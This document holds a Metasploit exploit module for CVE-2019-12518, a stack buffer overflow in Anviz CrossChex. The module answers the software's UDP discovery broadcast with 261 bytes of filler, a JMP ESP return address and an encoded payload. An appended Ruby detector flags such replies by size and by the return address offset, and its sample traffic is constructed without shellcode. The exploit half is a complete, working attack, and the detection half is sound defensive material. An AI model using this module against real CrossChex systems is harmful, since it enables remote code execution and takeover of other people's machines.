##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Size of the CrossChex discovery broadcast the module waits for
  PACKET_LEN = 10

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Anviz CrossChex Buffer Overflow',
      'Description'    => %q{
        Waits for broadcasts from Anviz CrossChex looking for new devices, and
        returns a custom broadcast, triggering a stack buffer overflow.
      },
      'Author'         =>
        [
          'Luis Catarino <lcatarino@protonmail.com>',             # original discovery/exploit
          'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
          'agalway-r7',                                           # Module creation
          'adfoster-r7'                                           # Module creation
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2019-12518'],
          ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
          ['EDB', '47734']
        ],
      'Payload'        =>
        {
          'Space'       => 8947,
          'DisableNops' => true
        },
      'Arch'           => ARCH_X86,
      'EncoderType'    => Msf::Encoder::Type::Raw,
      'Privileged'     => true,
      'Platform'       => 'win',
      'DisclosureDate' => '2019-11-28',
      'Targets'        =>
        [
          [
            'Crosschex Standard x86 <= V4.3.12',
            {
              'Offset' => 261,                # Overwrites memory to allow EIP to be overwritten
              'Ret'    => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
              'Shift'  => 4                   # Positions payload to be written at beginning of ESP
            }
          ]
        ],
      'DefaultTarget'  => 0
    ))

    deregister_udp_options

    register_options(
      [
        Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
        Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
        OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
      ])
  end

  def exploit
    connect_udp

    # Block until a CrossChex discovery broadcast arrives (or the timeout expires)
    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
    if res.empty?
      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
    end

    print_status "CrossChex broadcast received, sending payload in response"

    sploit = rand_text_english(target['Offset'])
    sploit << target.ret                          # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
    sploit << rand_text_english(target['Shift'])  # Positions payload to be written at beginning of ESP
    sploit << payload.encoded

    udp_sock.sendto(sploit, host, port)

    print_status "Payload sent"
  end
end
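The module's own metadata gives a defender everything needed for a network-level check: the discovery exchange is UDP on port 5050, a benign reply is tiny, and the overflow reply carries the fixed 'JMP ESP' address "\x07\x18\x42\x00" exactly 261 bytes in. The following Ruby is an added detection example and is not part of the Metasploit module or of the CrossChex product; it assumes datagrams are handed in as hashes with `src`, `src_port` and `payload` keys, that the reply is sent from the discovery port (as the module's CPORT option implies), and that a 128-byte ceiling for legitimate replies is a reasonable local threshold (a constructed assumption, to be tuned against real traffic). The sample traffic is constructed and contains no payload.

```ruby
# Added detection example for CVE-2019-12518 traffic; not code from the
# Metasploit module above. Datagram shape and the size threshold are assumptions.

CROSSCHEX_PORT = 5050                     # discovery port from the module's CPORT option
EIP_OFFSET     = 261                      # 'Offset' in the module's target definition
JMP_ESP_RET    = "\x07\x18\x42\x00".b     # 'Ret': little-endian address of JMP ESP in CrossChex
MAX_SANE_REPLY = 128                      # assumption: benign replies are far below the overflow offset

# Inspect one datagram (hash with :src, :src_port, :payload) and return a list of
# human-readable findings. An empty list means nothing matched.
def crosschex_reply_findings(datagram)
  findings = []
  return findings unless datagram[:src_port] == CROSSCHEX_PORT

  data = datagram[:payload].b   # force a binary view so byte offsets are exact

  if data.bytesize > MAX_SANE_REPLY
    findings << "oversized reply from CrossChex discovery port (#{data.bytesize} bytes)"
  end

  # The strongest indicator: the known return address sitting at the EIP offset.
  if data.bytesize >= EIP_OFFSET + JMP_ESP_RET.bytesize &&
     data.byteslice(EIP_OFFSET, JMP_ESP_RET.bytesize) == JMP_ESP_RET
    findings << "CVE-2019-12518 JMP ESP address at offset #{EIP_OFFSET}"
  end

  findings
end

# Run the check over a batch of datagrams and collect alerts per source host.
def scan_datagrams(datagrams)
  datagrams.each_with_object([]) do |dg, alerts|
    f = crosschex_reply_findings(dg)
    alerts << { src: dg[:src], findings: f } unless f.empty?
  end
end

# Constructed sample traffic (not captured from a real device or attacker).
SAMPLE_TRAFFIC = [
  # short reply from the discovery port: benign
  { src: "10.0.0.5", src_port: 5050, payload: "CROSSCHEX_DISCOVER_REPLY".b },
  # structure of the overflow reply without any shellcode: filler, ret, shift, filler
  { src: "10.0.0.9", src_port: 5050,
    payload: ("A" * 261) + "\x07\x18\x42\x00" + ("B" * 4) + ("C" * 64) },
  # large datagram from an unrelated port: ignored by this check
  { src: "10.0.0.7", src_port: 5051, payload: ("A" * 400) }
]

if __FILE__ == $0
  scan_datagrams(SAMPLE_TRAFFIC).each do |alert|
    puts "#{alert[:src]}: #{alert[:findings].join('; ')}"
  end
end
```

The size check alone would also fire on any future protocol change, so the offset match is the finding worth alerting on; the size finding is useful as supporting context, since the module always pads to exactly 261 bytes before the return address regardless of payload choice.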